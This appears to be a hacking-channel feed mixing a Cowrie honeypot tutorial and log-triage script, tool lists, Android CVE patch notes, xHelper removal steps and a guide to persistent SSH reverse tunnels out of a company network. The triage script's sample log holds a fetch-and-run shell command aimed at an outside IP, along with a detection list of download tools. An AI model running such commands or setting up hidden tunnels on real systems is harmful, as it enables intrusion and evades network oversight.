UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


Forwarded from PRIVATE UNDERCODE

🦑 To run an external (third-party, copied) working PHP script on Termux
After installing PHP:

1) pkg update

2) pkg install php

3) Save your (executable) script.php under /storage/
example: in /storage/emulated/0/Documents/...FULL...PATH.../
(together with any other files, e.g. files.txt, that the script uses)

4) Then, in the Termux app:
> cd /storage/emulated/0/Documents/...FULL...PATH.../
> php script.php

5) BUT ... before that:
"It is necessary to grant storage permission for Termux on [your device with] Android 6 and higher.
Use 'Settings>Apps>Termux>Permissions>Storage' and set to true."

@UndercOdeOfficial

🦑 Malware lab setup 2020: an SSH honeypot
Cowrie is a medium-interaction SSH and Telnet honeypot that logs brute-force attacks and an attacker's shell interaction.

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Change the port you will use to administer the server.
Cowrie will listen for SSH connections on port 22, so configure the real SSH service to listen on a different port that you use to connect to and administer the server.

2) sudo vi /etc/ssh/sshd_config
Under "# What ports, IPs and protocols we listen for", change the port number to 3393 or your preferred port number.

3) Write your changes and quit vi.
Ctrl + C
:wq

4) Restart the SSH service.
service ssh restart

5) By running the command below, you can see that the server is now listening for connections on port 3393.
netstat -tan

> Proto Recv-Q Send-Q Local Address Foreign Address State
> tcp 0 0 0.0.0.0:3393 0.0.0.0:* LISTEN

🦑 Install and Configure Cowrie

1) Download updated package lists.
> sudo apt-get update

2) Install Cowrie's dependencies.
> sudo apt-get install python2.7 git virtualenv libmpfr-dev libssl-dev libmpc-dev libffi-dev build-essential libpython-dev python-pip

3) Add a new user named cowrie.
> sudo adduser --disabled-password cowrie

4) Switch to the new user, cowrie.
> sudo su - cowrie

5) In the home directory of user cowrie, clone the cowrie git repository.
> git clone https://github.com/micheloosterhof/cowrie.git

6) Create a new Python virtual environment for cowrie.
> cd cowrie
> virtualenv cowrie-env

7) Activate the virtual environment.
> source cowrie-env/bin/activate
The terminal will now display (cowrie-env) before the username, cowrie.

8) Install pycrypto, Crypto and the other requirements.
(cowrie-env)$ pip install pycrypto Crypto
(cowrie-env)$ pip install -r requirements.txt

9) Generate a host key for the cowrie instance.
(cowrie-env)$ cd data
(cowrie-env)$ ssh-keygen -t dsa -b 1024 -f ssh_host_dsa_key
(cowrie-env)$ cd ..

10) export PYTHONPATH=/home/cowrie/cowrie

Additional Cowrie Configuration

11) Make a copy of the config file for your new cowrie instance.
(cowrie-env)$ cd /home/cowrie/cowrie/
(cowrie-env)$ cp cowrie.cfg.dist cowrie.cfg
(cowrie-env)$ vi ./cowrie.cfg

12) Set the hostname in the configuration file to a server name of your choice, e.g. fileserver4.

13) Change the port on which Cowrie listens for incoming SSH connections to port 22.

14) Write your changes and quit vi.
Ctrl + C
:wq

15) Enable authbind in cowrie's start.sh file.
> sudo vi /home/cowrie/cowrie/start.sh
Change line 2 to read:
AUTHBIND_ENABLED=yes

16) Install authbind and let the cowrie user bind port 22 with it.
> sudo apt-get install authbind
> sudo touch /etc/authbind/byport/22
> sudo chown cowrie /etc/authbind/byport/22
> sudo chmod 777 /etc/authbind/byport/22

🦑 Start Cowrie

1) Execute the following commands to start Cowrie.
> sudo su cowrie
> cd /home/cowrie/cowrie/
> source cowrie-env/bin/activate
> ./start.sh

2) Verify cowrie is listening on port 22 by running the command below.
> netstat -tan
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

3) Execute the following command to stop Cowrie.
> ./stop.sh
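Once Cowrie is running, the brute-force attempts and shell commands mentioned above land in its JSON event log (var/log/cowrie/cowrie.json by default). The triage script below is an added example, not code from the original post or from the Cowrie project; the sample events are constructed, using Cowrie's real field names (eventid, src_ip, session, username, password, input).

```python
"""Triage Cowrie's JSON event log: who brute-forced, with what, and what they ran."""
import json
from collections import Counter, defaultdict

# Constructed sample of Cowrie JSON events, one object per line (not a real capture).
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.5","src_port":50211,"dst_port":22,"session":"s1","protocol":"ssh","timestamp":"2020-02-10T08:00:01.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.5","session":"s1","username":"root","password":"123456","timestamp":"2020-02-10T08:00:02.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.5","session":"s1","username":"root","password":"admin","timestamp":"2020-02-10T08:00:03.000000Z"}
{"eventid":"cowrie.login.success","src_ip":"203.0.113.5","session":"s1","username":"root","password":"toor","timestamp":"2020-02-10T08:00:04.000000Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.5","session":"s1","input":"uname -a","timestamp":"2020-02-10T08:00:05.000000Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.5","session":"s1","input":"wget http://198.51.100.7/x.sh -O /tmp/x.sh; sh /tmp/x.sh","timestamp":"2020-02-10T08:00:06.000000Z"}
{"eventid":"cowrie.session.closed","src_ip":"203.0.113.5","session":"s1","duration":7.2,"timestamp":"2020-02-10T08:00:08.000000Z"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.23","src_port":40122,"dst_port":22,"session":"s2","protocol":"ssh","timestamp":"2020-02-10T08:05:00.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","session":"s2","username":"admin","password":"admin","timestamp":"2020-02-10T08:05:01.000000Z"}
{"eventid":"cowrie.session.closed","src_ip":"198.51.100.23","session":"s2","duration":1.1,"timestamp":"2020-02-10T08:05:02.000000Z"}
this line is not JSON and must be skipped
"""

# Substrings in attacker input that usually mean "fetch and run a payload".
DOWNLOAD_MARKERS = ("wget ", "curl ", "tftp ", "ftpget ", "/dev/tcp/")


def parse_events(text):
    """Yield event dicts, skipping malformed lines (rotation, truncation)."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except ValueError:
            continue
        if isinstance(event, dict) and "eventid" in event:
            yield event


def triage(text):
    """Summarise one Cowrie log: per-IP login stats and per-session commands."""
    failed = Counter()            # src_ip -> failed logins
    success = Counter()           # src_ip -> successful logins
    creds = Counter()             # (username, password) -> attempts
    commands = defaultdict(list)  # session -> commands typed
    session_ip = {}               # session -> src_ip
    for ev in parse_events(text):
        ip, sid = ev.get("src_ip"), ev.get("session")
        if sid:
            session_ip.setdefault(sid, ip)
        kind = ev["eventid"]
        if kind == "cowrie.login.failed":
            failed[ip] += 1
            creds[(ev.get("username"), ev.get("password"))] += 1
        elif kind == "cowrie.login.success":
            success[ip] += 1
            creds[(ev.get("username"), ev.get("password"))] += 1
        elif kind == "cowrie.command.input":
            commands[sid].append(ev.get("input", ""))
    return {"failed": failed, "success": success, "creds": creds,
            "commands": dict(commands), "session_ip": session_ip}


def brute_force_sources(summary, threshold=2):
    """IPs whose failed-login count reaches the threshold."""
    return sorted(ip for ip, n in summary["failed"].items() if n >= threshold)


def download_sessions(summary):
    """Sessions in which the attacker tried to fetch something from the network."""
    hits = {}
    for sid, cmds in summary["commands"].items():
        flagged = [c for c in cmds if any(m in c for m in DOWNLOAD_MARKERS)]
        if flagged:
            hits[sid] = flagged
    return hits


if __name__ == "__main__":
    s = triage(SAMPLE_LOG)
    print("brute-force sources:", brute_force_sources(s))
    print("top credentials:", s["creds"].most_common(3))
    for sid, cmds in download_sessions(s).items():
        print("session %s from %s fetched:" % (sid, s["session_ip"][sid]), cmds)
```

To run it over a real deployment, replace SAMPLE_LOG with the contents of cowrie.json and raise the threshold to suit your traffic.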

Written by Undercode

🦑 Useful Tools for IDS / IPS / Host IDS / Host IPS 2020

🦑 LET'S START:

1) Snort - Snort is a free, open source network intrusion prevention system (NIPS) and network intrusion detection system (NIDS) created by Martin Roesch. Snort is now developed by Sourcefire, of which Roesch is the founder and CTO. In 2009, Snort entered InfoWorld's Open Source Hall of Fame as one of the "greatest [open source] software of all time".

2) Bro - Bro is a powerful network analysis framework that is very different from the typical IDS you may know.

3) OSSEC - Comprehensive open source HIDS. Not for the faint of heart; it takes a little while to understand how it works. Performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response. It runs on most operating systems, including Linux, MacOS, Solaris, HP-UX, AIX and Windows. Lots of reasonable documentation. Sweet spot: medium to large deployments.

4) Suricata - Suricata is a high-performance network IDS, IPS and network security monitoring engine. Open source and owned by a community-run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF and its supporting vendors.

5) Security Onion - Security Onion is a Linux distribution for intrusion detection, network security monitoring and log management. It is based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, Snorby, ELSA, Xplico, NetworkMiner and many other security tools. The easy-to-use setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!

6) sshwatch - IPS for SSH, similar to DenyHosts, written in Python. It can also collect information about an attacker in a log during an attack.

7) Stealth - File integrity checker that leaves virtually no residue. The controller runs from another machine, which makes it difficult for an attacker to know that the file system is being checked at pseudo-random intervals over SSH. Highly recommended for small to medium deployments.

8) AIEngine - AIEngine is an interactive/programmable next-generation packet inspection engine for Python/Ruby/Java/Lua with learning capabilities that need no human intervention, NIDS (network intrusion detection system) functionality, DNS domain classification, network collector, network forensics and much more.

9) DenyHosts - Prevents SSH dictionary and brute-force attacks.

10) Fail2Ban - Scans log files and takes action against IP addresses that show malicious behaviour.

11) SSHGuard - A service protection daemon for SSH and other services, written in C.

12) Lynis - An open source security auditing tool for Linux/Unix.

Written by Undercode

🦑 Common honeypot and malware-analysis tools 2020 (top picks)

1) Damn Simple Honeypot (DSHP) - Honeypot framework with pluggable handlers.

2) NOVA - Uses honeypots as detectors; looks like a complete system.

3) OpenFlow Honeypot (OFPot) - Redirects traffic for unused IP addresses to a honeypot, built on POX.

4) OpenCanary - A modular and decentralised honeypot daemon that runs several canary versions of services and alerts when they are (ab)used.

5) ciscoasa_honeypot - Low-interaction honeypot for a Cisco ASA that can detect CVE-2018-0101, a DoS and remote code execution vulnerability.

6) miniprint - Medium-interaction printer honeypot.

🦑 Botnet C2 Tools

1) Hale - Botnet command and control monitor.

2) dnsMole - Analyses DNS traffic and can potentially detect botnet command and control server activity as well as infected hosts.

🦑 IPv6 attack detection tool

3) ipv6-attack-detector - A Google Summer of Code 2012 project supported by the Honeynet Project.

🦑 Dynamic code instrumentation toolkit

4) Frida - Inject JavaScript to explore native apps on Windows, Mac, Linux, iOS and Android.

🦑 Tool for converting a website into server honeypots

5) HIHAT - Transform arbitrary PHP applications into web-based high-interaction honeypots.

🦑 Malware collector

6) Kippo-Malware - Python script that downloads all malicious files stored as URLs in a Kippo SSH honeypot database.

🦑 Distributed sensor deployment

7) Modern Honey Network - Multi-snort and honeypot sensor management; uses a network of VMs, small SNORT installations, stealthy dionaeas and a centralised server for management.

🦑 Network analysis tools

1) Tracexploit - Replay network packets.

🦑 Log anonymiser

2) LogAnon - Log anonymisation library that helps keep logs consistent between logs and network captures.

🦑 Low-interaction honeypot (router back door)

3) Honeypot-32764 - Honeypot for the router back door (TCP 32764).

4) WAPot - Honeypot that can be used to observe traffic directed at home routers.

🦑 Honeynet farm traffic redirector

5) Honeymole - Deploy multiple sensors that redirect traffic to a centralised collection of honeypots.

🦑 HTTPS proxy

6) mitmproxy - Allows traffic flows to be intercepted, inspected, modified and replayed.

🦑 System instrumentation

1) Sysdig - Open source system-level exploration: capture system state and activity from a running GNU/Linux instance, then save, filter and analyse the results.

2) Fibratus - A tool for exploration and tracing of the Windows kernel.

🦑 Honeypot for USB-spreading malware

3) Ghost-usb - Honeypot for malware that propagates via USB storage devices.

🦑 Data collection

1) Kippo2MySQL - Extracts some very basic statistics from Kippo's text-based log files and inserts them into a MySQL database.

2) Kippo2ElasticSearch - Python script to transfer data from a Kippo SSH honeypot MySQL database to an ElasticSearch instance (server or cluster).

🦑 Passive network audit framework parser

3) Passive Network Audit Framework (pnaf) (https://github.com/jusafing/pnaf) - A framework that combines several passive and automated analysis techniques to provide a security assessment of network platforms.

🦑 VM monitoring and tools

1) Antivmdetect - Script to create templates for use with VirtualBox to make VM detection harder.

2) VMCloak - Automatically create and cloak a virtual machine for the Cuckoo sandbox.

3) vmitools (http://libvmi.com/) - A C library with Python bindings that makes it easy to monitor the low-level details of a running virtual machine.

🦑 Binary debugger

1) Hexgolems - Pint Debugger Backend - A debugger backend and LUA wrapper for PIN.

2) Hexgolems - Schem Debugger Frontend - A debugger frontend.

ALL OF THESE ARE AVAILABLE ON GITHUB; WE WILL WRITE SOME TUTORIALS FOR THEM
Written by Undercode

🦑 Deface topic: Deface is a library that allows you to customize HTML (ERB, Haml and Slim) views in a Rails application without editing the underlying view.

> It allows you to easily target HTML and ERB elements as the hooks for customization, using CSS selectors as supported by Nokogiri. Rails plugin that allows you to customize ERB views in a Rails application without editing the underlying view; updated in 2019.

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

1) on linux os clone https://github.com/spree/deface

2) go dir

3) Ensure that your layout views include doctype, html, head and body tags in a single file, as Nokogiri will create such elements if it detects any of these tags have been incorrectly nested.

4) Parsing will fail and result in invalid output if ERB blocks are responsible for closing an HTML tag that was opened normally, i.e. don't do this: &lt;div <%= ">" %>

5) Gems or Spree Extensions that add overrides to your application will load them in the order they are added to your Gemfile.

6) Applying an override to a view that contains invalid markup (which, occasionally happens in Spree views) can break rendering that would normally pass a browser's own permissive rendering. This is because the nokogiri library takes it upon itself to correct the issue, which doesn't happen prior to applying deface. Sometimes that correction changes the rendering of the view in an unintended manner, appearing to break it. The easiest way to tell if this is the cause of an issue for you is to put your view into http://deface.heroku.com/ and diff the output with the html which rails renders without your override. If you see a difference in the structure of the html, you may have invalid markup in your view which nokogiri is correcting for you. See Spree issue #1789 for an example of what may be wrong in a view.

@UndercOdeOfficial

🦑 The Best Antiviruses for Linux in 2020:

🦑 LET'S START:

1) Bitdefender GravityZone Business Security – Best for Businesses
www.bitdefender.com

2) Comodo Antivirus for Linux – Best for Home Users
> https://www.comodo.com/home/internet-security/antivirus-for-linux.php

3) ESET NOD32 Antivirus for Linux – Best for New Linux Users (Home)
> www.eset.com

4) Kaspersky Endpoint Security for Linux – Best for Hybrid IT Environments (Business)
> https://me-en.kaspersky.com/small-business-security?redef=1&THRU&reseller=me-en_meta-ksos_acq_ona_sem_bra_onl_b2c__psrch_______&utm_source=google&utm_medium=branded&utm_campaign=ksos-15&ksid=fb29975b-4f58-4bce-8b22-1697c3e77cf9&ksprof_id=434&ksaffcode=305783&ksdevice=c&kschadid=214581515961&kschname=google&kpid=Google|822220295|45727109471|214581515961|kwd-299077543916|c&gclid=EAIaIQobChMIhonei-jG5wIVSdHeCh0nPwlREAAYAiAAEgLYPvD_BwE

5) Sophos Antivirus for Linux – Recommended for Ubuntu Servers
> https://www.sophos.com/en-us/products/free-tools/sophos-antivirus-for-linux.aspx

@UndercOdeTesting

🦑 Topic 2019-2020 Termux scripts: gbt, a configurable prompt builder for Bash and ZSH

🦑 LET'S START:

a) Termux

> apt update

> apt install gbt

b) Arch Linux

> yaourt -S gbt

Or install gbt-git if you would like to run the latest and greatest from the master branch.

🦑 CentOS/RHEL
(Packages hosted by Packagecloud):

echo '[gbt]
name=GBT YUM repo
baseurl=https://packagecloud.io/gbt/release/el/7/$basearch
gpgkey=https://packagecloud.io/gbt/release/gpgkey
       https://packagecloud.io/gbt/release/gpgkey/gbt-release-4C6E79EFF45439B6.pub.gpg
gpgcheck=1
repo_gpgcheck=1' | sudo tee /etc/yum.repos.d/gbt.repo >/dev/null
sudo yum install gbt

Use the exact repository definition from above for all RedHat-based distributions regardless of their version.

🦑 Ubuntu/Debian/Kali
(Packages hosted by Packagecloud):

1) curl -L https://packagecloud.io/gbt/release/gpgkey | sudo apt-key add -

2) echo 'deb https://packagecloud.io/gbt/release/ubuntu/ xenial main' | sudo tee /etc/apt/sources.list.d/gbt.list >/dev/null

3) sudo apt-get update

4) sudo apt-get install gbt

5) Use the exact repository definition from above for all Debian-based distributions regardless of their version.

🦑 Mac
Using Homebrew:

1) brew tap jtyr/repo

2) brew install gbt

3) Or install gbt-git if you would like to run the latest and greatest from the master branch.

E N J O Y
@UndercOdeTesting

🦑 Termux web-pentest tool
> txtool is made to help you with easy pentesting in Termux.

1) git clone https://github.com/kuburan/txtool.git

2) cd txtool

3) apt install python2

4) ./install.py

5) txtool

@UndercOdeTesting


🦑 2020 all Android CVEs - VULNERABILITIES TO GAIN ACCESS ON ANY ANDROID:

   CVE             References          Type  Severity  Updated AOSP versions
1) CVE-2020-0014   A-128674520         EoP   High      8.0, 8.1, 9, 10
2) CVE-2020-0015   A-139017101         EoP   High      8.0, 8.1, 9, 10
3) CVE-2019-2200   A-67319274          EoP   High      10
4) CVE-2020-0017   A-123232892 [2]     ID    High      8.0, 8.1, 9, 10
5) CVE-2020-0018   A-139945049         ID    High      8.0, 8.1, 9, 10
6) CVE-2020-0020   A-143118731         ID    High      10
7) CVE-2020-0021   A-141413692 [2][3]  DoS   High      10

@UndercOdeOfficial

🦑 Let's start with the first Android vulnerability:

🦑 CVE-2020-0014 A-128674520 EoP High 8.0, 8.1, 9, 10 :

RESTRICT AUTOMERGE
Make toasts non-clickable

Since enforcement was only on client-side, in Toast class, an app could
use reflection (or other means) to make the Toast clickable. This is a
security vulnerability since it allows tapjacking, that is, intercept touch
events and do stuff like steal PINs and passwords.

This CL brings the enforcement to the system by applying flag
FLAG_NOT_TOUCHABLE.

Test: atest CtsWindowManagerDeviceTestCases:ToastTest
Test: Construct app that uses reflection to remove flag FLAG_NOT_TOUCHABLE and
log click events. Then:
1) Observe click events are logged without this CL.
2) Observe click events are not logged with this CL.

Bug: 128674520

Change-Id: Ic36585bc4f186e0224f5b687c49c0b3d9266838c
(cherry picked from commit b81f269ae2afb446b9d4a909fc2bcf038af00c41)

@UndercOdeTesting

🦑 CVE-2020-0015 A-139017101 EoP High 8.0, 8.1, 9, 10
Android bug details:

KeyChain: Do not allow hiding Cert Install dialog

Do not allow apps to float a window on top of the certificate
installation / naming dialog.

This obscures the CA certificate installation dialog and could be used
to trick a user into installing a CA certificate.

This is fixed by adding the HIDE_NON_SYSTEM_OVERLAY_WINDOWS system
flag when the activity is created (onCreate), so that another activity
starting in the foreground would not be able to obscure the dialog.

Bug: 139017101
Test: Manual, with an app that floats a window.
Change-Id: Iff8e678743c3883cf1f7f64390097a768ca00856
(cherry picked from commit afdacb2ec4c5cdc2fb2a9943fa5b48100f4725c8)


@UndercOdeTesting

🦑 NOW ANDROID SYSTEM BUGS, SUCH AS BLUETOOTH SOFTWARE BUGS, ANDROID 7-8-9

🦑 CVE References Type Severity Updated AOSP versions

1) CVE-2020-0022 A-143894715 DoS Moderate 10

> GAP: Correct the continuous pkt length in l2cap

L2cap continuous pkt length wrongly calculated in
reassembly logic when remote sends more data
than expected.

Wrong pkt length leading to memory corruption

Hence correct the continuous pkt length in
l2cap reassembly logic.

Bug: 135239489
Bug: 143894715
CRs-Fixed: 2434229
Test: make and internal testing
Change-Id: I758d9e31465b99e436b9b1841320000f08186c97
Merged-In: I758d9e31465b99e436b9b1841320000f08186c97
(cherry picked from commit 337bd4579453bd6bf98ff519de3ac1019cd30d28)
(cherry picked from commit 602f4b44fe30ec8b225e1cee5f96817607d93e5a)


   RCE Critical 8.0, 8.1, 9

2) CVE-2020-0023 A-145130871 ID Critical 10
> Enforce BLUETOOTH_PRIVILEGED in setPhonebookAccessPermission

Bug: 145130871
Test: POC
Merged-In: Ib4985e18de9f6695acc371da78deb240d42671f1
Change-Id: I3b8897166e223179fcbcf8c7a64e0c4d4ca974ef
(cherry picked from commit 8d1e8979f56acfe477bd3b84994a716a8391a8eb)


3) CVE-2020-0005 A-141552859 EoP High 8.0, 8.1, 9, 10

4) CVE-2020-0026 A-140419401 EoP High 8.0, 8.1, 9, 10

5) CVE-2020-0027 A-144040966 EoP High 8.0, 8.1, 9, 10

6) CVE-2020-0028 A-122652057 [2] ID High 9

🦑 After all these bugs, and the many more still coming for Android, you may have figured out the meaning of ''NOTHING IS SAFE''

🦑 For any doubt, feel free to ask us

@UndercOdeTesting

🦑 What is the xHelper virus, and why is it dangerous?
🦑 LET'S START:

1) xHelper is an Android malware that security vendor Malwarebytes first detected in May 2019. It is a stealthy piece of malware that is notoriously hard to remove: even after the user restores factory settings, the device gets re-infected, causing continuous trouble for users around the world.

2) Malwarebytes' security researchers have been studying the threat, and in a recent blog post the team stated that, although it is still not clear how the malware reinstalls itself, they have found enough information about how it operates to delete it permanently and prevent xHelper from reinstalling itself after a factory reset.

3) According to the Malwarebytes team, xHelper found a way to use a process in the Google Play Store app to trigger a reinstall. With a special directory created on the device, xHelper can hide its Android application package (APK) on disk. Unlike apps, these directories and files remain on the Android device even after a factory reset. Therefore, the device will keep getting infected until the directories and files are deleted.

4) Malwarebytes explained in its analysis of the malware: "Google Play is not infected with malware. However, something within Google Play is triggering the re-infection; it could be something that is being stored. In addition, it is possible that Google Play is acting as a smokescreen, appearing to be the source of the malware installation when it actually comes from elsewhere."

Written by UndercOde

🦑 Method to remove the xHelper virus:

🦑 LET'S START:

It is worth noting that the following removal steps rely on the user installing the Malwarebytes app for Android, but the app is free to use.

> The specific removal steps are as follows:

1) Install a file manager from Google Play that can search for files and directories.

2) Amelia uses ASTRO's File Manager.

3) Disable Google Play temporarily to stop the reinfection.

4) Go to Settings > Apps > Google Play Store

5) Press the Disable button. Then run a scan in Malwarebytes for Android to remove xHelper and other malware.

6) Manual uninstallation can be difficult, but the names to look for in the application info are fireway, xhelper and Settings (only if two Settings applications are displayed). Open the file manager and search for anything that starts with com.mufc.
If found, note the last-modified date.

> Pro tip: sort by date in the file manager.

7) In ASTRO's file manager, with "sort by date" enabled under view settings, delete everything starting with com.mufc, and anything with the same date (except for core directories such as Download).

8) Now re-enable Google Play:

9) Go to Settings > Apps > Google Play Store

10) Press the Enable button

Written by UndercOde

🦑 Intranet penetration using an SSH reverse tunnel, FULL, BY UndercOde:

1) Whether in a penetration test or otherwise, getting into an intranet is an important step. A machine on an internal network with an assigned private IP cannot be reached from the outside; an SSH reverse tunnel is one way to get through.

2) Suppose there are two machines, A and B. A has a public IP; B is behind NAT and has no port forwarding available. Now I want to initiate an SSH connection from A to B. Because B is behind NAT, there is no public IP + port combination that reaches it, so A cannot get through the NAT on its own. This article deals with that situation, which is the one most people run into.

3) Let's first assume the following machines:

Machine  Position        Address    Account  ssh/sshd port  Needs to run sshd
A        Public network  a.site     usera    22             yes
B        Behind NAT      localhost  userb    22             yes
C        Behind NAT      localhost  userc    22             no

SSH reverse tunnel connection

4) This method means actively establishing an SSH tunnel from B to A that forwards port 6766 on A to port 22 on B. As long as the tunnel stays open, this forwarding is effective: you only need to connect to port 6766 on A to reach B in reverse.

🦑 First establish an SSH tunnel on B that forwards port 6766 on A to port 22 on B:

1) B $ ssh -p 22 -qngfNTR 6766:localhost:22 usera@a.site

Then, on A, use port 6766 to SSH back to B:

2) A $ ssh -p 6766 userb@localhost

It really is that simple.

3) Maintaining the tunnel

Stability
> Unfortunately, the SSH connection will be closed after a timeout. If the connection is closed and the tunnel cannot be kept up, A can no longer use the reverse tunnel to get through B's NAT. So we need a way to provide a stable SSH tunnel.

4) One of the easiest methods is autossh. This program automatically re-establishes the SSH tunnel after a timeout, which solves the stability problem. On Arch Linux you can get it like this:

> $ sudo pacman -S autossh

5) Now do the same as before on B, except that the tunnel is maintained by autossh:

> $ autossh -p 22 -M 6777 -NR 6766:localhost:22 usera@a.site

The port given by the -M parameter is used to monitor the status of the tunnel and has nothing to do with the port forwarding.

6) Then you can reach B on port 6766 of A:

> $ ssh -p 6766 user@localhost

7) Establishing the tunnel automatically
There is still one problem: if B reboots, the tunnel disappears. So autossh needs to establish the SSH tunnel every time B starts. The natural idea is to make it a service; a systemd solution is given below.

Written by UndercOde

🦑 Intranet penetration using an SSH reverse tunnel, FULL, BY UndercOde, PART 2:

LET'S START:

🦑 "Punching holes"
The reason for this title is that I think this is a bit like UDP hole punching: via a machine on the public network, two machines that each sit behind their own NAT can establish an SSH connection.

1) Here's how to use the SSH reverse tunnel to connect from C to B.

First edit the sshd configuration file /etc/ssh/sshd_config on A and turn on the GatewayPorts switch:

2) GatewayPorts yes

Then restart sshd:

> A $ sudo systemctl restart sshd

Then slightly modify the autossh command used on B:

3) B $ autossh -p 22 -M 6777 -NR '*:6766:localhost:22' user@a.site

Then, on C, connect to B through port 6766 on A:

C $ ssh -p 6766 user@a.site

So far you have easily gone through two layers of NAT.

🦑 1) Final solution
Combining everything mentioned so far, the final solution is as follows:

2) First turn on the GatewayPorts switch of sshd on A and restart sshd.

3) Then create a new user autossh on B. Following the principle of least privilege, the autossh service on B runs as the user autossh to avoid security problems as far as possible:

B $ sudo useradd -m autossh
B $ sudo passwd autossh

Then create the SSH key for the autossh user on B and upload it to A:

B $ su - autossh
B $ ssh-keygen -t rsa -C 'autossh@B'
B $ ssh-copy-id user@a.site

Be careful not to set a passphrase for this key: when ssh-keygen asks, just press Enter all the way through and do not type any extra characters.

4) Then create a service file /lib/systemd/system/autossh.service on B that runs with the autossh user's privileges. Write the following text into the file and set its permissions to 644:

[Unit]
Description=Auto SSH Tunnel
After=network-online.target

[Service]
User=autossh
Type=simple
ExecStart=/bin/autossh -p 22 -M 6777 -NR '*:6766:localhost:22' usera@a.site -i /home/autossh/.ssh/id_rsa
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=always

[Install]
WantedBy=multi-user.target
WantedBy=graphical.target

To make network-online.target take effect on B:

5) B $ systemctl enable NetworkManager-wait-online

If you use systemd-networkd, the service to enable instead is systemd-networkd-wait-online. Then set the autossh service to start automatically:

> B $ systemctl enable autossh

If you like, you can start it immediately after this:

> B $ systemctl start autossh

Then, on A, you can use this reverse tunnel to get through B's NAT and SSH to B:

> A $ ssh -p 6766 user@localhost

Or, from C, SSH to B directly through two layers of NAT:

> C $ ssh -p 6766 user@a.site

If you are familiar with ssh, you can use this tunnel for more things. For example, you can request dynamic port forwarding when connecting back:

> C $ ssh -p 6766 -qngfNTD 7677 user@a.site

Suppose C is your home computer, A is your VPS and B is your company computer. If you do the above and then set your browser to use the local (localhost) SOCKS4 proxy on port 7677, you can browse the company's internal web pages from your home browser.
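The difference between part 1 (-R 6766:localhost:22, reachable only on A's loopback) and part 2 (GatewayPorts yes plus '*:6766:localhost:22', reachable from anywhere that can reach A) is decided by sshd's GatewayPorts setting, so it is worth checking what a given tunnel will expose before enabling it. The script below is an added example, not code from the original post or from OpenSSH: it models the GatewayPorts rules from sshd_config(5) for -R specs; the sshd_config fragments are constructed, and Match blocks and bracketed IPv6 bind addresses are not handled.

```python
"""Predict where an OpenSSH remote forward (-R) actually listens on host A.

Models the sshd GatewayPorts semantics: 'no' binds the forwarded port to
loopback whatever the client asked for, 'yes' forces the wildcard address,
'clientspecified' honours the client's bind address. Constructed example.
"""
import re

LOOPBACK = "127.0.0.1"
WILDCARD = "0.0.0.0"


def parse_remote_forward(spec):
    """Split an ssh -R spec into (bind_address, port, host, hostport).

    Accepts 'port:host:hostport' and 'bind:port:host:hostport'; an empty
    bind (as in ':6766:localhost:22') or '*' means "all interfaces".
    Bracketed IPv6 bind addresses are not handled here (assumption).
    """
    parts = spec.split(":")
    if len(parts) == 3:
        bind, port, host, hostport = None, parts[0], parts[1], parts[2]
    elif len(parts) == 4:
        bind, port, host, hostport = parts
        if bind == "":
            bind = "*"
    else:
        raise ValueError("unsupported -R spec: %r" % spec)
    return bind, int(port), host, int(hostport)


def gateway_ports_setting(sshd_config):
    """Return the effective GatewayPorts value from sshd_config text.

    sshd uses the first value it reads for a keyword; the default is 'no'.
    Match blocks are ignored here (assumption for this example).
    """
    for line in sshd_config.splitlines():
        line = line.split("#", 1)[0].strip()
        m = re.match(r"(?i)gatewayports\s+(\S+)", line)
        if m:
            return m.group(1).lower()
    return "no"


def effective_bind(gateway_ports, bind):
    """Address sshd binds the forwarded port to, per sshd_config(5)."""
    if gateway_ports == "no":
        return LOOPBACK       # the client's bind address is ignored
    if gateway_ports == "yes":
        return WILDCARD       # forced to the wildcard address
    if gateway_ports == "clientspecified":
        if bind is None:
            return LOOPBACK
        if bind == "*":
            return WILDCARD
        return bind           # e.g. one specific interface address
    raise ValueError("unknown GatewayPorts value: %r" % gateway_ports)


def audit_tunnel(sshd_config, spec):
    """Describe the exposure of one reverse tunnel on the public host (A)."""
    bind, port, host, hostport = parse_remote_forward(spec)
    addr = effective_bind(gateway_ports_setting(sshd_config), bind)
    return {"listen": "%s:%d" % (addr, port),
            "target": "%s:%d" % (host, hostport),
            "reachable_from_outside": addr != LOOPBACK}


# Constructed sshd_config fragments for A: before and after the part-2 change.
SSHD_CONFIG_DEFAULT = "Port 22\n#GatewayPorts no\nPermitRootLogin no\n"
SSHD_CONFIG_GATEWAY = "Port 22\nGatewayPorts yes\nPermitRootLogin no\n"

if __name__ == "__main__":
    for name, cfg in (("default", SSHD_CONFIG_DEFAULT),
                      ("GatewayPorts yes", SSHD_CONFIG_GATEWAY)):
        for spec in ("6766:localhost:22", "*:6766:localhost:22"):
            print(name, spec, audit_tunnel(cfg, spec))
```

With the default configuration both specs end up on 127.0.0.1:6766 (only A itself can reach B); with GatewayPorts yes even the bare spec ends up on 0.0.0.0:6766, so anyone who can reach A can reach B's sshd.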

🦑 There are other things this is useful for at home that I won't spell out; everyone knows them . . . . .

Written by UndercOde

🦑 Office memory corruption vulnerability CVE-2017-11882: arbitrary code execution, or DoS when exploitation fails; a PoC has been released:

